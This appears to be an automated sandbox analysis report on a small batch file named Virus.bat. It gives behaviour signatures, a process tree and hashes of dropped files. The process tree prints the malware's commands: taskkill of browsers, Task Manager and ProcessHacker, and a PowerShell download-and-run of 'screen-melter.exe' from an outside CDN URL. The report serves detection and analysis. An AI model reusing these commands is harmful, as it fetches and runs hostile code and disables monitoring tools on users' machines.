Analysis

  • max time kernel
    113s
  • max time network
    194s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20231020-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20231020-enlocale:en-usos:windows10-2004-x64system
  • submitted
    21/10/2023, 20:37

General

  • Target

    Virus.bat

  • Size

    568B

  • MD5

    acecd257f02e34d3bf496ca958b43c8b

  • SHA1

    652936e405caec5c43757db7dfe9b7e29b6cbd96

  • SHA256

    9745c4e2e22b15140e324dd59785803f72d04cb627cdc66fe3548c642576ec61

  • SHA512

    126a8ec4a659726083a028e075c8e7a0402ab6924b1333707d4a74c7629a18375e3cb727acf5023ebd095487c80732a128e890a9fa8debc6c551c23711bd28c7

Score
8/10

Malware Config

Signatures

  • Blocklisted process makes network request 1 IoCs
  • Downloads MZ/PE file
  • Modifies Installed Components in the registry 2 TTPs 7 IoCs
  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Executes dropped EXE 1 IoCs
  • Enumerates connected drives 3 TTPs 12 IoCs

    Attempts to read the root path of hard drives other than the default C: drive.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Checks SCSI registry key(s) 3 TTPs 64 IoCs

    SCSI information is often read in order to detect sandboxing environments.

  • Delays execution with timeout.exe 4 IoCs
  • Kills process with taskkill 4 IoCs
  • Modifies Internet Explorer settings 1 TTPs 4 IoCs
  • Modifies registry class 64 IoCs
  • Suspicious behavior: EnumeratesProcesses 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 64 IoCs
  • Suspicious use of SendNotifyMessage 64 IoCs
  • Suspicious use of SetWindowsHookEx 8 IoCs
  • Suspicious use of WriteProcessMemory 22 IoCs

Processes

  • C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\Virus.bat"
    1⤵
    • Checks computer location settings
    • Suspicious use of WriteProcessMemory
    PID:4376
    • C:\Windows\system32\taskkill.exe
      taskkill /F /IM "chrome.exe"
      2⤵
      • Kills process with taskkill
      • Suspicious use of AdjustPrivilegeToken
      PID:2688
    • C:\Windows\system32\taskkill.exe
      taskkill /F /IM "firefox.exe"
      2⤵
      • Kills process with taskkill
      • Suspicious use of AdjustPrivilegeToken
      PID:4664
    • C:\Windows\system32\taskkill.exe
      taskkill /F /IM "ProcessHacker.exe"
      2⤵
      • Kills process with taskkill
      • Suspicious use of AdjustPrivilegeToken
      PID:2196
    • C:\Windows\system32\taskkill.exe
      taskkill /F /IM "taskmgr.exe"
      2⤵
      • Kills process with taskkill
      • Suspicious use of AdjustPrivilegeToken
      PID:1632
    • C:\Windows\system32\timeout.exe
      timeout 4
      2⤵
      • Delays execution with timeout.exe
      PID:4812
    • C:\Windows\system32\timeout.exe
      timeout 2
      2⤵
      • Delays execution with timeout.exe
      PID:2000
    • C:\Windows\System32\WScript.exe
      "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\test.vbs"
      2⤵
        PID:3560
      • C:\Windows\system32\timeout.exe
        timeout 1
        2⤵
        • Delays execution with timeout.exe
        PID:3400
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        powershell Invoke-WebRequest 'https://cdn.glitch.global/128934fb-376a-4833-a71b-7536475431ef/screen-melter.exe?v=1697919791762' -OutFile getscreenmelted.exe
        2⤵
        • Blocklisted process makes network request
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:776
      • C:\Users\Admin\AppData\Local\Temp\getscreenmelted.exe
        getscreenmelted.exe
        2⤵
        • Executes dropped EXE
        PID:1564
      • C:\Windows\system32\timeout.exe
        timeout 10
        2⤵
        • Delays execution with timeout.exe
        PID:4132
    • C:\Windows\explorer.exe
      explorer.exe
      1⤵
      • Modifies Installed Components in the registry
      • Enumerates connected drives
      • Checks SCSI registry key(s)
      • Modifies registry class
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of FindShellTrayWindow
      • Suspicious use of SendNotifyMessage
      PID:4956
    • C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe
      "C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca
      1⤵
      • Modifies registry class
      • Suspicious use of SetWindowsHookEx
      PID:440
    • C:\Windows\explorer.exe
      explorer.exe
      1⤵
      • Modifies Installed Components in the registry
      • Enumerates connected drives
      • Checks SCSI registry key(s)
      • Modifies registry class
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of FindShellTrayWindow
      • Suspicious use of SendNotifyMessage
      PID:4984
    • C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe
      "C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca
      1⤵
      • Modifies registry class
      • Suspicious use of SetWindowsHookEx
      PID:4184
    • C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe
      "C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca
      1⤵
      • Modifies Internet Explorer settings
      • Modifies registry class
      • Suspicious use of SetWindowsHookEx
      PID:4212
    • C:\Windows\explorer.exe
      explorer.exe
      1⤵
      • Modifies Installed Components in the registry
      • Enumerates connected drives
      • Checks SCSI registry key(s)
      • Modifies registry class
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of SendNotifyMessage
      PID:3268
    • C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe
      "C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca
      1⤵
      • Modifies registry class
      • Suspicious use of SetWindowsHookEx
      PID:4524
    • C:\Windows\explorer.exe
      explorer.exe
      1⤵
      • Modifies Installed Components in the registry
      • Enumerates connected drives
      • Checks SCSI registry key(s)
      • Modifies registry class
      • Suspicious use of SendNotifyMessage
      PID:2448
    • C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe
      "C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca
      1⤵
      • Suspicious use of SetWindowsHookEx
      PID:464
    • C:\Windows\explorer.exe
      explorer.exe
      1⤵
      • Modifies Installed Components in the registry
      • Enumerates connected drives
      • Checks SCSI registry key(s)
      • Modifies registry class
      • Suspicious use of SendNotifyMessage
      PID:4988
    • C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe
      "C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca
      1⤵
      • Suspicious use of SetWindowsHookEx
      PID:1068
    • C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe
      "C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca
      1⤵
      • Modifies Internet Explorer settings
      • Modifies registry class
      • Suspicious use of SetWindowsHookEx
      PID:2640
    • C:\Windows\explorer.exe
      explorer.exe
      1⤵
      • Modifies Installed Components in the registry
      • Enumerates connected drives
      • Checks SCSI registry key(s)
      • Modifies registry class
      PID:3500
    • C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe
      "C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca
      1⤵
      • Suspicious use of SetWindowsHookEx
      PID:1128
    • C:\Windows\explorer.exe
      explorer.exe
      1⤵
      • Modifies Installed Components in the registry
      • Modifies registry class
      PID:4108
    • C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe
      "C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca
      1⤵
        PID:628
      • C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe
        "C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca
        1⤵
          PID:3728
        • C:\Windows\explorer.exe
          explorer.exe
          1⤵
            PID:3552
          • C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe
            "C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca
            1⤵
              PID:2840
            • C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe
              "C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca
              1⤵
                PID:4548
              • C:\Windows\explorer.exe
                explorer.exe
                1⤵
                  PID:5108
                • C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe
                  "C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca
                  1⤵
                    PID:3980
                  • C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe
                    "C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca
                    1⤵
                      PID:5080
                    • C:\Windows\explorer.exe
                      explorer.exe
                      1⤵
                        PID:4964
                      • C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe
                        "C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca
                        1⤵
                          PID:4232
                        • C:\Windows\explorer.exe
                          explorer.exe
                          1⤵
                            PID:324
                          • C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe
                            "C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca
                            1⤵
                              PID:4384
                            • C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe
                              "C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca
                              1⤵
                                PID:32
                              • C:\Windows\explorer.exe
                                explorer.exe
                                1⤵
                                  PID:4164

                                Network

                                      MITRE ATT&CK Enterprise v15

                                      Replay Monitor

                                      Loading Replay Monitor...

                                      Downloads

                                      • C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\Microsoft\Internet Explorer\DOMStore\PLWGO8RS\microsoft.windows[1].xml

                                        Filesize

                                        97B

                                        MD5

                                        f128c2e0ca6fdf389f373297783c59a8

                                        SHA1

                                        eb968a744f196cf0a69cdbc7c725846c95da97c2

                                        SHA256

                                        726c6823337026920e523fe897a914b5d84c61112995df032e55a5de42cd58ae

                                        SHA512

                                        07ee8e74f19e28e00596539780e1960095921684debb376dbde039ab2cc47155438a3fc65ca1f0c011e3a8a11aa30ecdefad811acedc812396c24e57f9b78b80

                                      • C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\TokenBroker\Cache\fbaf94e759052658216786bfbabcdced1b67a5c2.tbres

                                        Filesize

                                        2KB

                                        MD5

                                        40e3d09f59462689275c3f350437e9d7

                                        SHA1

                                        dbfb6f1dacf9ea23b02e9b0c0d7a58a76ec55b40

                                        SHA256

                                        eb14accc24425833f3f20d2ed4aa805f510d27c673e07ace6e10d4d3eafb95d8

                                        SHA512

                                        2e12042036eb5124583cbb42e32fc166665c6619de2362b5b274c35087b67e35a852a95b58fac625ca359995e149d419e5dd2065adf02c76be210968bd0333e4

                                      • C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\TempState\StartUnifiedTileModelCache.dat

                                        Filesize

                                        23KB

                                        MD5

                                        5cfd746dfd4db2b39a003f104acd08dc

                                        SHA1

                                        403a1e04c5b754d33435f0ba9499ffa80c5c3d2b

                                        SHA256

                                        5d3725f3bff17044f4c65298b30cbbe84a3f6fa63d4af30c57fa4e00a40046e5

                                        SHA512

                                        3fcc96485a0c7825514c31a2bc6a5995d88a3c7e816d7e2a218ba7e0851c86cea9b29bdff239b662518bca938873d0f76fe4b4bf89bc996437fa7ad585cc54a4

                                      • C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\TempState\StartUnifiedTileModelCache.dat

                                        Filesize

                                        23KB

                                        MD5

                                        5cfd746dfd4db2b39a003f104acd08dc

                                        SHA1

                                        403a1e04c5b754d33435f0ba9499ffa80c5c3d2b

                                        SHA256

                                        5d3725f3bff17044f4c65298b30cbbe84a3f6fa63d4af30c57fa4e00a40046e5

                                        SHA512

                                        3fcc96485a0c7825514c31a2bc6a5995d88a3c7e816d7e2a218ba7e0851c86cea9b29bdff239b662518bca938873d0f76fe4b4bf89bc996437fa7ad585cc54a4

                                      • C:\Users\Admin\AppData\Local\Packages\microsoft.windows.search_cw5n1h2txyewy\AC\Microsoft\Internet Explorer\DOMStore\PLWGO8RS\microsoft.windows[1].xml

                                        Filesize

                                        97B

                                        MD5

                                        f128c2e0ca6fdf389f373297783c59a8

                                        SHA1

                                        eb968a744f196cf0a69cdbc7c725846c95da97c2

                                        SHA256

                                        726c6823337026920e523fe897a914b5d84c61112995df032e55a5de42cd58ae

                                        SHA512

                                        07ee8e74f19e28e00596539780e1960095921684debb376dbde039ab2cc47155438a3fc65ca1f0c011e3a8a11aa30ecdefad811acedc812396c24e57f9b78b80

                                      • C:\Users\Admin\AppData\Local\Packages\microsoft.windows.search_cw5n1h2txyewy\AC\Microsoft\Internet Explorer\DOMStore\PLWGO8RS\microsoft.windows[1].xml

                                        Filesize

                                        97B

                                        MD5

                                        f128c2e0ca6fdf389f373297783c59a8

                                        SHA1

                                        eb968a744f196cf0a69cdbc7c725846c95da97c2

                                        SHA256

                                        726c6823337026920e523fe897a914b5d84c61112995df032e55a5de42cd58ae

                                        SHA512

                                        07ee8e74f19e28e00596539780e1960095921684debb376dbde039ab2cc47155438a3fc65ca1f0c011e3a8a11aa30ecdefad811acedc812396c24e57f9b78b80

                                      • C:\Users\Admin\AppData\Local\Packages\microsoft.windows.search_cw5n1h2txyewy\AC\Microsoft\Internet Explorer\DOMStore\PLWGO8RS\microsoft.windows[1].xml

                                        Filesize

                                        97B

                                        MD5

                                        f128c2e0ca6fdf389f373297783c59a8

                                        SHA1

                                        eb968a744f196cf0a69cdbc7c725846c95da97c2

                                        SHA256

                                        726c6823337026920e523fe897a914b5d84c61112995df032e55a5de42cd58ae

                                        SHA512

                                        07ee8e74f19e28e00596539780e1960095921684debb376dbde039ab2cc47155438a3fc65ca1f0c011e3a8a11aa30ecdefad811acedc812396c24e57f9b78b80

                                      • C:\Users\Admin\AppData\Local\Packages\microsoft.windows.search_cw5n1h2txyewy\AC\Microsoft\Internet Explorer\DOMStore\PLWGO8RS\microsoft.windows[1].xml

                                        Filesize

                                        97B

                                        MD5

                                        f128c2e0ca6fdf389f373297783c59a8

                                        SHA1

                                        eb968a744f196cf0a69cdbc7c725846c95da97c2

                                        SHA256

                                        726c6823337026920e523fe897a914b5d84c61112995df032e55a5de42cd58ae

                                        SHA512

                                        07ee8e74f19e28e00596539780e1960095921684debb376dbde039ab2cc47155438a3fc65ca1f0c011e3a8a11aa30ecdefad811acedc812396c24e57f9b78b80

                                      • C:\Users\Admin\AppData\Local\Packages\microsoft.windows.search_cw5n1h2txyewy\AC\Microsoft\Internet Explorer\DOMStore\PLWGO8RS\microsoft.windows[1].xml

                                        Filesize

                                        97B

                                        MD5

                                        f128c2e0ca6fdf389f373297783c59a8

                                        SHA1

                                        eb968a744f196cf0a69cdbc7c725846c95da97c2

                                        SHA256

                                        726c6823337026920e523fe897a914b5d84c61112995df032e55a5de42cd58ae

                                        SHA512

                                        07ee8e74f19e28e00596539780e1960095921684debb376dbde039ab2cc47155438a3fc65ca1f0c011e3a8a11aa30ecdefad811acedc812396c24e57f9b78b80

                                      • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_d0kj5nfz.s3s.ps1

                                        Filesize

                                        60B

                                        MD5

                                        d17fe0a3f47be24a6453e9ef58c94641

                                        SHA1

                                        6ab83620379fc69f80c0242105ddffd7d98d5d9d

                                        SHA256

                                        96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

                                        SHA512

                                        5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

                                      • C:\Users\Admin\AppData\Local\Temp\getscreenmelted.exe

                                        Filesize

                                        338KB

                                        MD5

                                        383b185a3392c09fb0d6806a620af738

                                        SHA1

                                        258216b8c1a5fec83714af8947d15dce74ec3695

                                        SHA256

                                        3c32a62072facbcbee6cc06442cc33071ee00b375dee1d7c6d22c3e9b1343c99

                                        SHA512

                                        6d0faf7ff886637377a9474c126d84a9ba68088b4e0eaa8326da97ac02358c6f6c116069195f7794c6a8c7d4a8ebc89880d8b4239b21d360592378577d723f54

                                      • C:\Users\Admin\AppData\Local\Temp\getscreenmelted.exe

                                        Filesize

                                        338KB

                                        MD5

                                        383b185a3392c09fb0d6806a620af738

                                        SHA1

                                        258216b8c1a5fec83714af8947d15dce74ec3695

                                        SHA256

                                        3c32a62072facbcbee6cc06442cc33071ee00b375dee1d7c6d22c3e9b1343c99

                                        SHA512

                                        6d0faf7ff886637377a9474c126d84a9ba68088b4e0eaa8326da97ac02358c6f6c116069195f7794c6a8c7d4a8ebc89880d8b4239b21d360592378577d723f54

                                      • C:\Users\Admin\AppData\Local\Temp\test.vbs

                                        Filesize

                                        38B

                                        MD5

                                        aeb73b0a0ee7d49f92aa3aa4804af613

                                        SHA1

                                        090da974e8282340d6cce5c9f6ab0a49bb3f42c7

                                        SHA256

                                        83ef2db5053f760ea0d8b036af3f860ae6e5ab0e8aefc399bbf766a39a535a65

                                        SHA512

                                        f7eb36c5ee935a3957ea9974089cad1bd5a79743697f2adae619a3091230cfa1a17c10d61cf551efc7e8546c13f6041b3ff8456a12cede1aef697f0677fe70fb

                                      • memory/32-173-0x000001AA4ADF0000-0x000001AA4AE10000-memory.dmp

                                        Filesize

                                        128KB

                                      • memory/32-169-0x000001AA4A7A0000-0x000001AA4A7C0000-memory.dmp

                                        Filesize

                                        128KB

                                      • memory/32-167-0x000001AA4A7E0000-0x000001AA4A800000-memory.dmp

                                        Filesize

                                        128KB

                                      • memory/324-159-0x0000000002A80000-0x0000000002A81000-memory.dmp

                                        Filesize

                                        4KB

                                      • memory/776-45-0x0000013649200000-0x0000013649210000-memory.dmp

                                        Filesize

                                        64KB

                                      • memory/776-43-0x00007FFD627F0000-0x00007FFD632B1000-memory.dmp

                                        Filesize

                                        10.8MB

                                      • memory/776-9-0x00000136491D0000-0x00000136491F2000-memory.dmp

                                        Filesize

                                        136KB

                                      • memory/776-21-0x0000013649200000-0x0000013649210000-memory.dmp

                                        Filesize

                                        64KB

                                      • memory/776-49-0x00007FFD627F0000-0x00007FFD632B1000-memory.dmp

                                        Filesize

                                        10.8MB

                                      • memory/776-20-0x0000013649200000-0x0000013649210000-memory.dmp

                                        Filesize

                                        64KB

                                      • memory/776-19-0x00007FFD627F0000-0x00007FFD632B1000-memory.dmp

                                        Filesize

                                        10.8MB

                                      • memory/776-46-0x0000013649200000-0x0000013649210000-memory.dmp

                                        Filesize

                                        64KB

                                      • memory/2640-69-0x0000023844830000-0x0000023844850000-memory.dmp

                                        Filesize

                                        128KB

                                      • memory/2640-64-0x0000023844460000-0x0000023844480000-memory.dmp

                                        Filesize

                                        128KB

                                      • memory/2640-67-0x0000023844420000-0x0000023844440000-memory.dmp

                                        Filesize

                                        128KB

                                      • memory/3552-104-0x0000000002D00000-0x0000000002D01000-memory.dmp

                                        Filesize

                                        4KB

                                      • memory/3728-96-0x00000263E1EC0000-0x00000263E1EE0000-memory.dmp

                                        Filesize

                                        128KB

                                      • memory/3728-94-0x00000263E18A0000-0x00000263E18C0000-memory.dmp

                                        Filesize

                                        128KB

                                      • memory/3728-91-0x00000263E18E0000-0x00000263E1900000-memory.dmp

                                        Filesize

                                        128KB

                                      • memory/4108-84-0x0000000004110000-0x0000000004111000-memory.dmp

                                        Filesize

                                        4KB

                                      • memory/4212-32-0x0000020F3A000000-0x0000020F3A020000-memory.dmp

                                        Filesize

                                        128KB

                                      • memory/4212-34-0x0000020F3A490000-0x0000020F3A4B0000-memory.dmp

                                        Filesize

                                        128KB

                                      • memory/4212-29-0x0000020F3A080000-0x0000020F3A0A0000-memory.dmp

                                        Filesize

                                        128KB

                                      • memory/4548-112-0x000001F0F0BA0000-0x000001F0F0BC0000-memory.dmp

                                        Filesize

                                        128KB

                                      • memory/4548-116-0x000001F0F0FD0000-0x000001F0F0FF0000-memory.dmp

                                        Filesize

                                        128KB

                                      • memory/4548-114-0x000001F0F0F10000-0x000001F0F0F30000-memory.dmp

                                        Filesize

                                        128KB

                                      • memory/4984-23-0x00000000044A0000-0x00000000044A1000-memory.dmp

                                        Filesize

                                        4KB

                                      • memory/4988-56-0x0000000003040000-0x0000000003041000-memory.dmp

                                        Filesize

                                        4KB

                                      • memory/5080-140-0x00000299CCFA0000-0x00000299CCFC0000-memory.dmp

                                        Filesize

                                        128KB

                                      • memory/5080-138-0x00000299CCB90000-0x00000299CCBB0000-memory.dmp

                                        Filesize

                                        128KB

                                      • memory/5080-135-0x00000299CCBD0000-0x00000299CCBF0000-memory.dmp

                                        Filesize

                                        128KB

                                      • memory/5108-127-0x0000000004E10000-0x0000000004E11000-memory.dmp

                                        Filesize

                                        4KB